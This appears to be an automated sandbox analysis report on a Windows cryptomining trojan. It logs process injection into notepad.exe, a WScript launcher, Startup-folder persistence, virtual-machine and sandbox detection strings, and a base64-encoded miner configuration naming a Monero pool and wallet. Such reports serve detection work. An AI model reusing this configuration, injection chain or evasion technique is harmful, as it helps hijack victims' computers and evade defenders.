Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00405420 CreateProcessW,NtQueryInformationProcess,GetCurrentProcess,GetThreadContext,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,ReadProcessMemory,ReadProcessMemory,GetCurrentProcess,GetCurrentProcess,VirtualAlloc,ReadProcessMemory,VirtualFree,VirtualFree,GetProcAddress,Sleep,VirtualAlloc,VirtualFree,CloseHandle,CloseHandle,CloseHandle,NtClose,NtClose,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess | 16_2_00405420
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00406D50 NtClose | 16_2_00406D50
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00406D70 NtClose | 16_2_00406D70
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00408730 NtOpenProcess,NtTerminateProcess,NtClose | 16_2_00408730
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004087C0 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose | 16_2_004087C0
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe | Code function: String function: 01462F80 appears 35 times
Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe | Code function: String function: 014616E0 appears 63 times
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: String function: 00402F80 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: String function: 004016E0 appears 63 times
Source: 4rC1bQcnl5.exe, 00000000.00000003.291231944.00000000041EA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameFzzisztdzkzaueisyxrosd.dllN vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000000.00000002.325147325.0000000000D96000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000000.00000002.325851049.00000000030B0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000000.00000002.325864568.00000000030C0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000000.00000002.325615282.0000000001460000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 0000000F.00000002.321380036.0000000000396000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000010.00000002.496150874.0000000000F96000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe, 00000010.00000002.496689113.0000000001560000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 4rC1bQcnl5.exe
Source: 4rC1bQcnl5.exe | Binary or memory string: OriginalFilenamenotepad.exe. vs 4rC1bQcnl5.exe
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: 4rC1bQcnl5.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 18.2.notepad.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000010.00000002.496587950.0000000001480000.00000004.00000020.sdmp, type: MEMORY | Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url, type: DROPPED | Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: classification engine | Classification label: mal100.expl.evad.mine.winEXE@25/14@2/3
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary | 16_2_004080E0
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4rC1bQcnl5.exe.log
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Mutant created: \Sessions\1\BaseNamedObjects\e9c1286a28d82a2d0ee6
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5196:120:WilError_01
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | File created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: 4rC1bQcnl5.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\notepad.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: 4rC1bQcnl5.exe | Virustotal: Detection: 17%
Source: 4rC1bQcnl5.exe | ReversingLabs: Detection: 23%
Source: 4rC1bQcnl5.exe | String found in binary or memory: kIfRsNKdTulQVcrIGWrGFBNjyA+Ir5kNBlPt5sSLvBrNhJIwQE1\7QTWGRzcUuL68Y9c0EdLn0Tic3fUH9wtnc/8k8SbzdfYTi66kxvcD+lf0cEseFdz2u/Sw9bvGbHLx9F7xVvOqqa+lVfVS93gc3Iui8\7UXzQPZQfPBPG/e4+kD0UaWjwmb2uvRB9UKzF92E9KTxvvM9DBcS3fWQ95j6Jv5MHRHzh/aDdvBPNfeK+on0nbGhQjb2m/SZ9V8fEt\70
Source: 4rC1bQcnl5.exe | String found in binary or memory: pgz/LsWkaX78NnbyrLeJOO7p\7ykOKfUe8aM0qwMFx2zSAc6AU2bb9GIQzGKHBABAw5QbCHCDhkAvtl6SD4zCRrVGBAaOJReOiK2ZQ5t5WdSB3+uBU0VdIvtEG8AU0R\7NFZQl/AdDqkAZhGWOUPHFAD/ElsA7gFpaYewakdIollIFwmiLKP8i+cVMyJym8fGBDf/Hsq0obI+nyFiLo8wd9Y010iKJC2hh4JmH\78Rv+d5xMhMqUkWKRvyMfC9B0Jv4U
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | File read: C:\Users\user\Desktop\4rC1bQcnl5.exe
Source: unknown | Process created: C:\Users\user\Desktop\4rC1bQcnl5.exe 'C:\Users\user\Desktop\4rC1bQcnl5.exe'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Process created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Process created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 4rC1bQcnl5.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 4rC1bQcnl5.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 4rC1bQcnl5.exe | Static file information: File size 3627520 > 1048576
Source: 4rC1bQcnl5.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x372800
Source: 4rC1bQcnl5.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Data Obfuscation:

.NET source code contains potential unpacker
Source: 4rC1bQcnl5.exe, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4rC1bQcnl5.exe.0.dr, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.4rC1bQcnl5.exe.a20000.0.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.4rC1bQcnl5.exe.a20000.0.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.2.4rC1bQcnl5.exe.20000.0.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 15.0.4rC1bQcnl5.exe.20000.0.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: csrss.16.dr, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.0.4rC1bQcnl5.exe.c20000.0.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 16.2.4rC1bQcnl5.exe.c20000.2.unpack, b.cs | .Net Code: a System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary | 16_2_004080E0
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Code function: 0_2_00A23696 pushad ; ret | 0_2_00A23697
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 15_2_00023696 pushad ; ret | 15_2_00023697
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Code function: 16_2_00C23696 pushad ; ret | 16_2_00C23697
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | File created: C:\ProgramData\LKBNMTFJgl\csrss
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | File created: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | File created: C:\ProgramData\LKBNMTFJgl\csrss
Source: C:\Windows\SysWOW64\wscript.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viTRMUuKeV.url
Source: C:\Users\user\Desktop\4rC1bQcnl5.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\notepad.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\conhost.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 9503Jump to behavior
                        Source: C:\Windows\notepad.exeWindow / User API: threadDelayed 492Jump to behavior
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe TID: 776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 2372Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe TID: 5572Thread sleep count: 36 > 30Jump to behavior
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe TID: 5572Thread sleep time: -72000s >= -30000sJump to behavior
                        Source: C:\Windows\notepad.exe TID: 5180Thread sleep count: 9503 > 30Jump to behavior
                        Source: C:\Windows\notepad.exe TID: 5180Thread sleep count: 492 > 30Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exeCode function: 16_2_00403CA0 NtClose,GetSystemInfo,RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,NtClose,16_2_00403CA0
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: 0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: svchost.exe, 00000005.00000002.497700396.0000015D39A62000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmpBinary or memory string: vmware
                        Source: cfg.16.drBinary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCg
kJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==
                        Source: cfgi.16.dr Binary or memory string: [string elided]
                        Source: 4rC1bQcnl5.exe Binary or memory string: o5Q/JuhlHzyiu5xNZSs8oomwX2liOqCB\7PnwoJnYRf0LPoeh5vgGEWSu580GXNQuEHQZxGPS4AyMnuXQtx+M7LxYQaxBjTcO6kyJ23UvuQrc2vo9z7g4ozLJYvhFYKNW3sGRpb\7hstAbPRfbrItzKyFTW5/eV/YDtTBUJkwrzgQUJQMHueS9VmciiY13MpGN/yCPRKcRZumiyBEG20FLO+Prwa/bEeJUozeplMORvyDT\74JNK1D07QSd3sAPSySBD
                        Source: svchost.exe, 00000005.00000002.497443323.0000015D39A4A000.00000004.00000001.sdmp, notepad.exe, 00000012.00000002.495903859.0000020F8D9C8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
                        Source: svchost.exe, 00000007.00000002.494099059.000002551DC02000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                        Source: 4rC1bQcnl5.exe, 00000000.00000002.326220706.00000000031C1000.00000004.00000001.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                        Source: notepad.exe, 00000012.00000002.495903859.0000020F8D9C8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW -
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                        Source: 4rC1bQcnl5.exe Binary or memory string: JI/VeLlt9QHyBDUyEvAeR9f/w5uKT9kRIwabc64Oej/eIR8xRp6z9JLNqa/7RKO94cjV2+ahqeMUCzIE5vCtMjNMHeUe8qh5hS\7kYSPf4rQpMdeDbMbAWLvL2pcL2cqjsvqhe9B/2iiFQyklwB/DIhC9I0SN5xBbz/943HsXHJ9OP3Co1/KVFNGRLu+YSBF8VssbJlvA\71tDNVksfLiDe9EPjHgv6+6CkYT0gBOKtqXLh2Nm1VK1DJexTWP9bIDu2h
                        Source: svchost.exe, 00000005.00000002.494359874.0000015D34429000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@
                        Source: 4rC1bQcnl5.exe Binary or memory string: Sa/ClFiaf3NmG/bqd5yROUpeJOUUpCB9ib7rxFsPQrE5j4dHFtDrxI2\7rHRx1un/BFkKrvkoKV2JZL6XXnpjgzuRMiFXqspzzyBVEoGs4PqfT6ccmcANWi872iqwtgxlR8qe5BQcIjpxOcoYAV7+Ym4qqgADs\7hHGFsU40jYSTj1Qg5vNB9OfxSqDP7w/X3mBGv4/8DT5DfFpl8xc9Flmakt04M5TFj9gHr8C+COCwxyUhI4mfkhkbZZu0ONdmsVDK
                        Source: svchost.exe, 00000007.00000002.494245708.000002551DC28000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.494230868.000001C8D463E000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.494971594.000001FC47C29000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: svchost.exe, 00000004.00000002.259041604.0000023928F40000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.497106058.000001C8D5340000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.303376421.000001CE95B40000.00000002.00000001.sdmp, svchost.exe, 0000000E.00000002.320578593.0000024E88AB0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Code function: 16_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,FindCloseChangeNotification,FreeLibrary
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Code function: 16_2_00402E40 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Program Files (x86)\EemhFwbGCKjPJmwwSNVcVmBXGbyfVGPxGbavDiSrUXISbGiVubNzBxBCESuBmCkMLWEVdYB\oQOWFbKllEKo.exe Code function: 17_2_01462E40 mov eax, dword ptr fs:[00000030h]
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Code function: 16_2_00401800 GetProcessHeap,HeapAlloc
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Process token adjusted: Debug
                        Source: C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\4rC1bQcnl5.exe Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion:

                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\notepad.exe Domain query: xmr-us-east1.nanopool.org
                        Source: C:\Windows\notepad.exe Network Connect: 192.99.69.170 108
                        Allocates memory in foreign processes
